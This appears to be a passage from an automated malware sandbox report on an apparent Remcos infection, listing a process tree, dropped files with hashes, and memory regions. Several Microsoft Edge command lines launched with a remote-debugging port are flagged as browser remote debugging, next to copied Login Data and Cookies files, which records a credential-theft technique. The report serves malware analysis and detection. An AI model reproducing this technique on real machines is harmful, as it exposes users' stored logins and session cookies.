                        PID:4016
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,9096847165925291247,12480495912472824627,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2588 /prefetch:8
                        4⤵
                          PID:5004
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2148,9096847165925291247,12480495912472824627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
                          4⤵
                          • Uses browser remote debugging
                          PID:2376
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2148,9096847165925291247,12480495912472824627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                          4⤵
                          • Uses browser remote debugging
                          PID:4796
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2148,9096847165925291247,12480495912472824627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
                          4⤵
                          • Uses browser remote debugging
                          PID:3952
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2148,9096847165925291247,12480495912472824627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
                          4⤵
                          • Uses browser remote debugging
                          PID:3504
                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                    1⤵
                      PID:3840
                    • C:\Windows\System32\CompPkgSrv.exe
                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                      1⤵
                        PID:2564
                      • C:\Windows\System32\CompPkgSrv.exe
                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                        1⤵
                          PID:3020

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\remcos\logs.dat

                          Filesize

                          144B

                          MD5

                          a57811288ec41b05687c4ab045e78462

                          SHA1

                          80fab3023f6cae99c5460e40bdb44958a7b9a36e

                          SHA256

                          846583ccda0ba3eea74f8590440bc8f76d96aeea28090e721053e60f92785d3d

                          SHA512

                          4641e171b6676e651dd75d845e435281b2f7ab57ded2e4203271d327da22688dadc0bafd5ab84355da529cceb76c55d12a3a631d0968e93707485df826b4482b

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          d4ff23c124ae23955d34ae2a7306099a

                          SHA1

                          b814e3331a09a27acfcd114d0c8fcb07957940a3

                          SHA256

                          1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

                          SHA512

                          f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

                          Filesize

                          152B

                          MD5

                          54d1b9c8c2f1d2c8440e0eb77a703957

                          SHA1

                          ca77e0ed84f47df945a8481e1260a4a910ab5051

                          SHA256

                          18dfe0a09881c6226475c823f0cfdd62b6a9a333130836f0a12b3bf50029dd72

                          SHA512

                          0da0539f23795e3f1fc408a7172318abf3da193330552b6271c998c06a95e64ea8530323dde190722db82756b23533b4b9970a6765e10eb2c0cd5ca293086ca0

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

                          Filesize

                          152B

                          MD5

                          025da16a9189678711a0dba02fb18014

                          SHA1

                          c3418ad8c269bcaf5400b7490b07af9cb97f066f

                          SHA256

                          8567a2050185e740a73d982578923a1e3a0a08f10a62552ba0fa0c5bceed3f5d

                          SHA512

                          6cbceaf6485012474aebcaac81bae39aa65467e6fad8d53b9894ecccaaebf5c6ddeef1cf673b07922ac0edacb888c68349539d9454f7e0ec26d3d58ed0586246

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

                          Filesize

                          152B

                          MD5

                          2ca2629ad1f8851086c5368328723f72

                          SHA1

                          58b7499ad936db2cf83cc69de4027a2b3fc5bf0b

                          SHA256

                          610e8914d4c005c74a9da1241b362bf0e824c5efe22818f88efc9d3f487ad1f3

                          SHA512

                          477e511a69d711cf8532d52a9bf3f6a999249612caaa4d7338cb8fbf5265255b28194a7944d4b34088065275b67984c7c2b68c3a52eea0813f2e9e3323602053

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

                          Filesize

                          40B

                          MD5

                          8b8fcfa3bcb743cd680ba0d10468ea21

                          SHA1

                          005c782190ca34241472d44ee6922b44d2a30d00

                          SHA256

                          7be7863c29949ea110a5b4f4d0034ac29d847e072ad041e2310286c24e686290

                          SHA512

                          7822522150bb47c740af95500345e958234e813883214d891b9f1cf512f89b24241788ab82425e6bfc838cf8e2ee74b99ffa1d1b204ee908e707e352878faeb4

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

                          Filesize

                          20B

                          MD5

                          9e4e94633b73f4a7680240a0ffd6cd2c

                          SHA1

                          e68e02453ce22736169a56fdb59043d33668368f

                          SHA256

                          41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304

                          SHA512

                          193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

                          Filesize

                          48B

                          MD5

                          fcb36b4bee3168d6853d1f6fb079afb0

                          SHA1

                          93447ee4e62617d5fbe6847c34c384ac79dd55b6

                          SHA256

                          7d984ff2ea8ccddeb1fd0063f2143ac10857b145404b95e04e3b9fd2ec432635

                          SHA512

                          471312bface025b2ad5f0368433dc45a7752d73041c4a7bf1cf52c13c4b126fc45f806b0eab2b7957c57702fef5ad93eda673592bfcf1c6155278247947a1378

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index

                          Filesize

                          24B

                          MD5

                          54cb446f628b2ea4a5bce5769910512e

                          SHA1

                          c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

                          SHA256

                          fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

                          SHA512

                          8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Extension State\LOG

                          Filesize

                          263B

                          MD5

                          3d73e6a389975b789f2f8d57e48f3559

                          SHA1

                          f6c850a064da2445c2611f6b538eac0d93ca6802

                          SHA256

                          d96d70b97a60353a1d31440205fc98d3bb381535e5be5c383840126ce039b6ec

                          SHA512

                          2c426c7b020feb92ac350593740d5a7c8babb5decc78f286c89308541fda2df4123abe35b3cbf13c45de145be264947b6f5ee9e91f3a07f442ec6f1dd525eec7

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

                          Filesize

                          20KB

                          MD5

                          b40e1be3d7543b6678720c3aeaf3dec3

                          SHA1

                          7758593d371b07423ba7cb84f99ebe3416624f56

                          SHA256

                          2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4

                          SHA512

                          fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

                          Filesize

                          256KB

                          MD5

                          27f0b49167f9ef87ee361db8575c7a89

                          SHA1

                          5c266233ccdd8567627f4bb963dec82c7382ac00

                          SHA256

                          305b6d0c5bab5c2456ba8b7daddd6cdfd939087196aefdb0f2183f8180bd6632

                          SHA512

                          9c1f415156e6e10d58cd650922ed3c8d583f97e00b951c853c678151e7b3ee681a2165270673870b8713f01398be1c5701b00ee61470221fc87c258dfe12027f

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

                          Filesize

                          192KB

                          MD5

                          d30bfa66491904286f1907f46212dd72

                          SHA1

                          9f56e96a6da2294512897ea2ea76953a70012564

                          SHA256

                          25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907

                          SHA512

                          44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\000001.dbtmp

                          Filesize

                          16B

                          MD5

                          46295cac801e5d4857d09837238a6394

                          SHA1

                          44e0fa1b517dbf802b18faf0785eeea6ac51594b

                          SHA256

                          0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                          SHA512

                          8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

                          Filesize

                          277B

                          MD5

                          05bd03085f50441df1abe8f030166058

                          SHA1

                          bfcf94a819218bbbfe04e894b56bbbc26ac61da1

                          SHA256

                          df53269716aede6fcea8571cf9acba9d7798233784cdf4a4bf65b1304b8b69c4

                          SHA512

                          b41125d20ed5645c095fd22c5301a6574fadce107f55d95b63cd31a0209b3ae2776774e057063d73cbd82169c8a7ee007af1f4b80dbe372d625001b2424d5355

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

                          Filesize

                          41B

                          MD5

                          5af87dfd673ba2115e2fcf5cfdb727ab

                          SHA1

                          d5b5bbf396dc291274584ef71f444f420b6056f1

                          SHA256

                          f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                          SHA512

                          de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

                          Filesize

                          40KB

                          MD5

                          a182561a527f929489bf4b8f74f65cd7

                          SHA1

                          8cd6866594759711ea1836e86a5b7ca64ee8911f

                          SHA256

                          42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                          SHA512

                          9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

                          Filesize

                          1KB

                          MD5

                          703b1391602f94f8686377a776b02c6f

                          SHA1

                          4ce8059a1cd9f54a411b95529d6a7ebed681e23c

                          SHA256

                          64c97e0e7503b5c771d339286d190d9dcfc6866f8f5e4c38a1b3ce484289b5b4

                          SHA512

                          fc975c8039c515281a1bf547c212ef1be09eacc4cc324610e29f0564d525e3997cfd57206f731bf30ddb66377f7ab3a3a21e0ccdd41d5e86ac677d9e71fc03bc

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

                          Filesize

                          20KB

                          MD5

                          fba4571938cd015459aa6ed77d115a65

                          SHA1

                          54fde5d14a046a44ae2625de9003b759d4b19ec9

                          SHA256

                          f4c56f8398596d3be48c0bb2ab122b6366b980780b75afdb4e2f28295bcc0d01

                          SHA512

                          1604df6c173574211bb492bff43a3391ef3a7d7877a5edcfc30c5d80ff3b3dca5cb5cf15e1dd776aac0248189a9df5340461f57a18b37c6fbfcf5d04da4ebc6a

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

                          Filesize

                          2B

                          MD5

                          d751713988987e9331980363e24189ce

                          SHA1

                          97d170e1550eee4afc0af065b78cda302a97674c

                          SHA256

                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                          SHA512

                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

                          Filesize

                          5KB

                          MD5

                          aef1e37d79ebee37759bd6ec460a7ac4

                          SHA1

                          25774bf8304057f1d062bd16d4fbc82d99ca39c6

                          SHA256

                          7c495b1d5a55e57791228942662673049b9e65c61033a4405275e0e803019f85

                          SHA512

                          1afb4b86a0b7113c1d10086f709fe2409369f33803ecb9a232420a37abe7163e6ff4f3c1a6e70cad03687babe81e5747622e2977b38bface8f6c8ca1e2cfb65f

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

                          Filesize

                          1KB

                          MD5

                          b48ed78fa1fb941b515f74b52fb1dca4

                          SHA1

                          6833d24d0a079eee124987150f719abb72989744

                          SHA256

                          335d3428a522b9cd6fbedc14d9664bba5b6ce573eb5d1d86e2023a22e3d72546

                          SHA512

                          845118738800dfd8449863a903f8f94927fb5c6a6cfc45e5d08ef32f62136a2df4ea6a784a2e9f95147189678b5775034234d52f6f38247a9ac371726d531c12

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

                          Filesize

                          15KB

                          MD5

                          dde4555bdf5ade5a50e4e213061aec8e

                          SHA1

                          fea52c1ac82b0822021551dd87ca5b671b0dcc3b

                          SHA256

                          d3afee736c6e6461df00a7f00e1489e9bc9c0d944b3457a49c952dc0bc72ce2f

                          SHA512

                          2fda7e265ce18b052efa3046374aa0c2cd45ffc632ba1534ded402dffcbbc2fd9aacebc5954e7845b286127e550f0745c18d303506ca40e9a1e02c791b22daa8

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

                          Filesize

                          24KB

                          MD5

                          e3d9b9088eed4e4aa81e8188f50e44de

                          SHA1

                          a31bb3d265b5b82747ed302ba9ec8d392f78f5fa

                          SHA256

                          42f4942a6ea75451e5b4d2cb8cf75187be66d540ae519eba5bf2dee370b8cd51

                          SHA512

                          0c96b6b1f6203b37f36a6960aeb64ff0e00c87eac6e4dd2619617940acf9b0e468df09dbbaa06d9a8ae7f61494b8afdb3a4960ab50ba32a65a55711c85099f5c

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

                          Filesize

                          241B

                          MD5

                          9082ba76dad3cf4f527b8bb631ef4bb2

                          SHA1

                          4ab9c4a48c186b029d5f8ad4c3f53985499c21b0

                          SHA256

                          bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd

                          SHA512

                          621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

                          Filesize

                          279B

                          MD5

                          bda09923b839b2e8c6f26df7b58b552e

                          SHA1

                          7ff96644e5300f92af39bd4a72a0fd3cd59a1953

                          SHA256

                          0165c0c034bf6cf9de4ddd9ad6342bcbe2cff062f40d3dd494b03196499d8b32

                          SHA512

                          0c844e277113b34589bfa835dfd26585380b8e5f97daeeebfbd098ae7f055fa1f875b0e96e53467becf2ca4bdc7a2667b2e1172d61ff622ea5ded55f42305c36

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

                          Filesize

                          80B

                          MD5

                          69449520fd9c139c534e2970342c6bd8

                          SHA1

                          230fe369a09def748f8cc23ad70fd19ed8d1b885

                          SHA256

                          3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277

                          SHA512

                          ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

                          Filesize

                          265B

                          MD5

                          685a1fb0d4cf501c657087d348b78a31

                          SHA1

                          14902bd29c3323c993a501e2776522dd45018709

                          SHA256

                          6c791c48b4b3b6a1824a9c3a2ff7ac1b2e23a8b466b0a3d72c7666188b36b1b0

                          SHA512

                          a3de763ba38cd5a9f3c43e571ef3d91e0bd812cd300dc22226317d56d59dd8af839f93aefbf4d8067d5c758deabae10eb600a76ec8d5823e4b39ffafc9ce29da

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

                          Filesize

                          40B

                          MD5

                          148079685e25097536785f4536af014b

                          SHA1

                          c5ff5b1b69487a9dd4d244d11bbafa91708c1a41

                          SHA256

                          f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8

                          SHA512

                          c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

                          Filesize

                          291B

                          MD5

                          0908e72a703dfbccb5edf572be5e7ee7

                          SHA1

                          f467a5fa90041c6555d381a71f947a5d68ca9bb4

                          SHA256

                          1e26cc29e4644ab6be22c2c80439bcb70c83c30144f8f819cd29b3ba7eb00bc1

                          SHA512

                          f847854fcaeffb3460c5327e2766ad9e6543ce8949d581073c777f2a140ace5457aa0f1430c822c36ccad299911622eedce15d1384589acaee775b7f768f1320

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

                          Filesize

                          46B

                          MD5

                          90881c9c26f29fca29815a08ba858544

                          SHA1

                          06fee974987b91d82c2839a4bb12991fa99e1bdd

                          SHA256

                          a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a

                          SHA512

                          15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

                          Filesize

                          263B

                          MD5

                          3d56950ed0ecd9b4c64e13b862598ac5

                          SHA1

                          a79d808c40315984a7cffa38e6c459ed669b9f62

                          SHA256

                          d26900720927674afce0b22dbfd419ce20e46e52da49007f4ca2c792c00fc674

                          SHA512

                          0737457c8dc00232632f3185d3a98df5f52131d10f7fffeee991947ba687f6ef5552342aea82df60c3e3b97a69141e2de03f508d32e5da02697bc06d19ff2b01

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

                          Filesize

                          20KB

                          MD5

                          986962efd2be05909f2aaded39b753a6

                          SHA1

                          657924eda5b9473c70cc359d06b6ca731f6a1170

                          SHA256

                          d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889

                          SHA512

                          e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

                          Filesize

                          128KB

                          MD5

                          50fedb3330e2f68894a9677ff9a8a98f

                          SHA1

                          875b31ff49494b161462eb879110346606e66f5d

                          SHA256

                          1d272a245d020eed6d31b626a888efb6f91921730a3c46d5803dcd07ce30e0d0

                          SHA512

                          fda340efb393756b95c7c4081efb3bd684cdba494f735cb3d1d5a3fc02cf7d889dd32fbb6f42a786eddf1e0171d8ace7cce18a766caa8068c0d991fd8f0398a6

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

                          Filesize

                          114KB

                          MD5

                          dfb5d1ac791a236e321a20ee1e5ec109

                          SHA1

                          5ca2ec54dfd3efc7b4da27577fe16c9123031fac

                          SHA256

                          17f930711f438fa86f4fe476ffa3c6665239f4ab4078913ed94406bda3a38141

                          SHA512

                          d60c18ff6dd86c953dbff05da38abd7a4e8d015be707b4fffc8a9e0790598bb372ede72c2ac1f05f31165a0b5ea0ee201f583b2b5149f58a23dfe730f44a97f7

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

                          Filesize

                          4KB

                          MD5

                          6618005888b2d259b50120b3320939be

                          SHA1

                          4ae7e71ae91ae52187c5aaefd066c6f2322167e8

                          SHA256

                          6b83d3d719c2c8dc29cc8048b9cfd1c775dce9a3b18a407dd96d824e70771581

                          SHA512

                          806734c9de5d838ff9ab0329e2b8aabc45752db0861f75c3461f30fb736d21063f6ef7468b7797a7990921306c61aeeccef5a5f9f5deb147e352e20fe15a4e37

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

                          Filesize

                          263B

                          MD5

                          4819623a3cc5d8cf859c8f5a913d5ce9

                          SHA1

                          7a8b0c75ea1738d33ec1843f7434eaabc6a1aa95

                          SHA256

                          ba70908d2e2e6962f39d5e56f19f383e7b41d99e66a62f53fa86b8f0660c5cad

                          SHA512

                          983cefccb39c43e7c1f272c5c5d65c51b1c44aa3d6dc0c184e6e4760d392afdabcccd76c90617c28569ab2a5992786fd45cbf51f34e8576a5aa1bdf2e88cbb1c

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

                          Filesize

                          682B

                          MD5

                          637fc75bd529b23b8c6f5f0bc526cfb1

                          SHA1

                          688d120a849cc9c9344d1682973b91af527c5170

                          SHA256

                          c163576fe4c4298a8d8c0876d0884c9230dcf5adacc6c7022e56d6875eddf57a

                          SHA512

                          30f97fcc4be775562a8d90284f2d72558988538f2f2614589ad87d21c67f68ba3fc6daef0c33a11f4e0f8715e4c7aa3d0bb1942e69314169a88a751970deae88

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

                          Filesize

                          281B

                          MD5

                          8569a9f9702bac5d613769fa559fde4f

                          SHA1

                          58db3213558c960591aebaa68db4ad60dc375422

                          SHA256

                          d2ff1462fa1bf7c3681c52af39c481ad2c3586a5ce3fbcdcd472006ba6cd0bfc

                          SHA512

                          33f5dbe8925ce862387240cb49586221806abdd7f11a83bfe8f1b8850bfcac1a68bf46f7cd3bde9d1d8c50ea0ba8b6fa97bd44acada2c9971d83254415f78204

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

                          Filesize

                          8KB

                          MD5

                          cf89d16bb9107c631daabf0c0ee58efb

                          SHA1

                          3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

                          SHA256

                          d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

                          SHA512

                          8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

                          Filesize

                          264KB

                          MD5

                          d0d388f3865d0523e451d6ba0be34cc4

                          SHA1

                          8571c6a52aacc2747c048e3419e5657b74612995

                          SHA256

                          902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

                          SHA512

                          376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

                          Filesize

                          8KB

                          MD5

                          0962291d6d367570bee5454721c17e11

                          SHA1

                          59d10a893ef321a706a9255176761366115bedcb

                          SHA256

                          ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                          SHA512

                          f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

                          Filesize

                          8KB

                          MD5

                          41876349cb12d6db992f1309f22df3f0

                          SHA1

                          5cf26b3420fc0302cd0a71e8d029739b8765be27

                          SHA256

                          e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

                          SHA512

                          e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

                          Filesize

                          11B

                          MD5

                          838a7b32aefb618130392bc7d006aa2e

                          SHA1

                          5159e0f18c9e68f0e75e2239875aa994847b8290

                          SHA256

                          ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

                          SHA512

                          9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

                          Filesize

                          8KB

                          MD5

                          6abf5a8c6db898ee486d83e7764b1dee

                          SHA1

                          aa125375c880f227ce957324ed9df20d60ba3bb5

                          SHA256

                          ac890a0bf5d3f73eb6a8bae6bc58cb182d55e3271f7745ad14544fbe8c4eaef3

                          SHA512

                          7d1ae182f201c1095431dfbb2cf702e5cfcfc6e234cf06497d6356a3a3c4b5e9f2524518e1685b1c958185114f42f57350532449e23ceba771ab13ead977b511

                        • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

                          Filesize

                          116KB

                          MD5

                          9bed18a6a25ecf19b0f1d8d498ba6e37

                          SHA1

                          0881953caa7292d310a141e8328afea758f1f3f8

                          SHA256

                          cb988dcf03326d8e1076196e59f0b21ed837c4177cccca0ea24495730eb8a09a

                          SHA512

                          a9047584fece63e144667172ad0c114912838b6e9c62b6411bae12407e3d5eee8ed077ac48a87e39acbf84af87160645842e00d63eaf703ec78057613ba4e686

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0131pjyp.eem.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\ieczsovpjdhsfmfkey

                          Filesize

                          4KB

                          MD5

                          57509a6a6267f17bef5e5da8b1df8829

                          SHA1

                          0886741be12c4e6dd24688df7b9568e91b2fc2aa

                          SHA256

                          4d50e4b2ee7b25d6a88dea6a28503975ca95f98e6e72fcd1ee754d016df3ed3d

                          SHA512

                          019c20a2354ef20ff3870ea4d544ae4e7ec21729bfbeb19d2dd2f8b087fcb6b83f259ab2f35e0f3c7f044ebb7c5bbfdfc63f23b811d458a15f5ad35aa9175228

                        • C:\Users\Admin\AppData\Roaming\Rudeknusers.Tow

                          Filesize

                          463KB

                          MD5

                          3ae889406ac2f0623338e2841e800a5d

                          SHA1

                          9516341a83a17996ce5d2c9070e79e956662d82f

                          SHA256

                          90628cbf145ca7e743e051e6fa138c2b54c273d5644036800f68d81330dfa93e

                          SHA512

                          668907cec94a541db75bd0a71a99d6105329292c3856a976fce2f4b59b23e1f8dc52daf6f0e32f7cb4a0a51b8d7ce601f5ff5f59767e4c4e3361d6fa59e2b08b

                        • \??\pipe\crashpad_5076_JAXRCXAGXNEUYTFH

                          MD5

                          d41d8cd98f00b204e9800998ecf8427e

                          SHA1

                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                          SHA256

                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                          SHA512

                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                        • memory/468-64-0x0000000001000000-0x0000000002254000-memory.dmp

                          Filesize

                          18.3MB

                        • memory/468-200-0x00000000233D0000-0x00000000233E9000-memory.dmp

                          Filesize

                          100KB

